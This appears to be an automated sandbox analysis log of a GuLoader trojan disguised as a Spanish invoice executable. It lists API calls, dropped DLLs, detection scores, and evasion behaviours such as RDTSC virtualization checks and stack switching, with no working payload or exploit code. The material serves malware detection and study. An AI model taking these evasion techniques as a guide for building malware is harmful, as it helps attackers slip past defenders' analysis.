      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A41A23_2_325A41A2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250C6E03_2_3250C6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325147503_2_32514750
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F07703_2_324F0770
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EC7C03_2_324EC7C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A24463_2_325A2446
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325944203_2_32594420
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259E4F63_2_3259E4F6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F05353_2_324F0535
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B05913_2_325B0591
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EEA803_2_324EEA80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AAB403_2_325AAB40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A6BD73_2_325A6BD7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F28403_2_324F2840
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FA8403_2_324FA840
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251E8F03_2_3251E8F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D68B83_2_324D68B8
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325069623_2_32506962
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F29A03_2_324F29A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BA9A63_2_325BA9A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F0E593_2_324F0E59
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AEE263_2_325AEE26
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AEEDB3_2_325AEEDB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32502E903_2_32502E90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325ACE933_2_325ACE93
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32564F403_2_32564F40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32510F303_2_32510F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32592F303_2_32592F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32532F283_2_32532F28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E2FC83_2_324E2FC8
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FCFE03_2_324FCFE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256EFA03_2_3256EFA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F0C003_2_324F0C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E0CF23_2_324E0CF2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32590CB53_2_32590CB5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258CD1F3_2_3258CD1F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FAD003_2_324FAD00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EADE03_2_324EADE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32508DBF3_2_32508DBF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 32525130 appears 58 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 3255EA12 appears 82 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 3256F290 appears 103 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 324DB970 appears 280 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 32537E54 appears 111 times
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: invalid certificate
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000000.00000000.1992613676.0000000000461000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.0000000032781000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.000000003227B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000000.2238615889.0000000000461000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/6@0/1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00404060 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,0_2_00404060
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_0040234F LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040234F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nscBF6C.tmpJump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeVirustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile read: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_73472351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73472351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B135E push eax; iretd 3_2_324B1369
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B225F pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B27FA pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B283D push eax; iretd 3_2_324B2858
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E09AD push ecx; mov dword ptr [esp], ecx3_2_324E09B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI/Special instruction interceptor: Address: 4F46F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI/Special instruction interceptor: Address: 1B66F34
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeRDTSC instruction interceptor: First address: 4F06F11 second address: 4F06F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8EC0E4C268h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeRDTSC instruction interceptor: First address: 1B26F11 second address: 1B26F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8EC0AFB528h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeEvaded block: after key decisiongraph_0-4544
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI coverage: 0.2 %
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe TID: 1576Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2327283512.000000000249A000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361283807.000000000249A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI call chain: ExitProcess graph end nodegraph_0-4432
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402048 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00402048
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_73472351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73472351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D250 mov ecx, dword ptr fs:[00000030h]3_2_3256D250
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9240 mov eax, dword ptr fs:[00000030h]3_2_324D9240
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9240 mov eax, dword ptr fs:[00000030h]3_2_324D9240
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B256 mov eax, dword ptr fs:[00000030h]3_2_3259B256
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B256 mov eax, dword ptr fs:[00000030h]3_2_3259B256
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251724D mov eax, dword ptr fs:[00000030h]3_2_3251724D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521270 mov eax, dword ptr fs:[00000030h]3_2_32521270
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521270 mov eax, dword ptr fs:[00000030h]3_2_32521270
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32509274 mov eax, dword ptr fs:[00000030h]3_2_32509274
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AD26B mov eax, dword ptr fs:[00000030h]3_2_325AD26B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AD26B mov eax, dword ptr fs:[00000030h]3_2_325AD26B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517208 mov eax, dword ptr fs:[00000030h]3_2_32517208
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517208 mov eax, dword ptr fs:[00000030h]3_2_32517208
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5227 mov eax, dword ptr fs:[00000030h]3_2_325B5227
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F2D0 mov eax, dword ptr fs:[00000030h]3_2_3250F2D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F2D0 mov eax, dword ptr fs:[00000030h]3_2_3250F2D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E92C5 mov eax, dword ptr fs:[00000030h]3_2_324E92C5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E92C5 mov eax, dword ptr fs:[00000030h]3_2_324E92C5
